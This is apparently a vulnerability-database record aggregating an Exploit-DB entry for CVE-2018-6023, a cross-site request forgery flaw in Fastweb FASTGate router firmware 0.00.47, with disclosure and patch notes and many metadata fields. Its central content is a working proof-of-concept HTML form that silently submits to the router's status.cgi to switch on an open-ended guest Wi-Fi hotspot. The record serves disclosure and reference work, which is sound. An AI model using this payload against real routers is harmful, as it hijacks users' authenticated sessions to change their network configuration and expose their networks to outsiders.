ID
VAR-E-201805-0367
CVE
| cve_id: | CVE-2018-6023 | Trust: 1.5 |
EDB ID
44606
TITLE
Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery. CVE-2018-6023 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | fastweb | model: | fastgate | scope: | eq | version: | 0.00.47 | Trust: 2.1 |
EXPLOIT
# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
# Date: 09-05-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.47
# CVE: CVE-2018-6023
I DESCRIPTION
========================================================================
An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc.
The vulnerability was disclosed to Fastweb on 19 January 2018.
Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018.
II PROOF OF CONCEPT
========================================================================
## Activate Gues Wi-Fi:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.254/status.cgi">
<input type="hidden" name="_" value="1516312144136" />
<input type="hidden" name="act" value="nvset" />
<input type="hidden" name="hotspot_broadcast_ssid" value="1" />
<input type="hidden" name="hotspot_enable" value="1" />
<input type="hidden" name="hotspot_filtering" value="all" />
<input type="hidden" name="hotspot_security" value="WPA2PSK" />
<input type="hidden" name="hotspot_ssid" value="GUEST-Test" />
<input type="hidden" name="hotspot_timeout" value="-1" />
<input type="hidden" name="service" value="wl_guestaccess" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
III REFERENCES
========================================================================
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | csrf | Trust: 0.5 |
CREDITS
Raffaele Sabato
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 44606 | Trust: 1.6 |
| db: | NVD | id: | CVE-2018-6023 | Trust: 1.5 |
| db: | EDBNET | id: | 97759 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 147571 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-6023 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/44606/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 147571 |
| db: | EXPLOIT-DB | id: | 44606 |
| db: | EDBNET | id: | 97759 |
LAST UPDATE DATE
2022-07-27T09:26:57.490000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 147571 | date: | 2018-05-10T10:03:13 |
| db: | EXPLOIT-DB | id: | 44606 | date: | 2018-05-10T00:00:00 |
| db: | EDBNET | id: | 97759 | date: | 2018-05-10T00:00:00 |